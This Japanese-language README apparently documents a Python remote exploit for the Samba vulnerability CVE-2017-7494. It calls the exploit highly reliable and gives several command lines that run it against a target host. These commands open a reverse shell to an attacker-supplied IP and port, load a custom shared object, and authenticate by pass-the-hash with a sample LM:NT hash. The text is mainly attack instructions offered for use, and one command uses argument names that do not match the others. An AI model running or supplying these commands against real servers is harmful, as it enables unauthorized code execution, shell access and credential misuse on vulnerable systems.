
CVE-2017-7494 python エクスプロイト
SAMBA CVE-2017-7494 脆弱性(別名 is_know_pipename!)のリモートエクスプロイト
このエクスプロイトは3つの部分に分かれています:
ターゲットが脆弱であり、ペイロードがターゲットのオペレーティングシステムおよびアーキテクチャに適切である限り、このエクスプロイトは非常に信頼性が高いです。
ターゲットに対してエクスプロイトを実行し、シェルが起動するのを待ちます:
$ python noSAMBAnoCRY.py -r RHOST
$ python noSAMBAnoCRY.py -r RHOST -u userTest -P 123 --lhost RevShellIP --lport RevShellPort
samba バージョン 3.5.0 > 3.6.0 の場合は、引数 -o 1 を追加するだけです。
python noSAMBAnoCRY.py -r RHOST --lhost LHOST --lport LPORT -o 1
独自のカスタム .so を実行する
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes 00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 -c cp.so
カスタム samba ポートを使用するには、引数 -p を使用します。
$ python noSAMBAnoCRY.py -t RHOST -p 4450 -u userTest -P 123 --rhost shell_ip --rport shell_port
smbpasswd のハッシュに遭遇してクラックできない場合は、引数 --hashes=LM:NT を使用してパス・ザ・ハッシュ(pass-the-hash)が可能です。
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes=00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 --lhost RevShellIP
このリポジトリは以下のリポジトリから着想を得ています: joxeankoret/exploit-CVE-2017-7494 および Archivaldo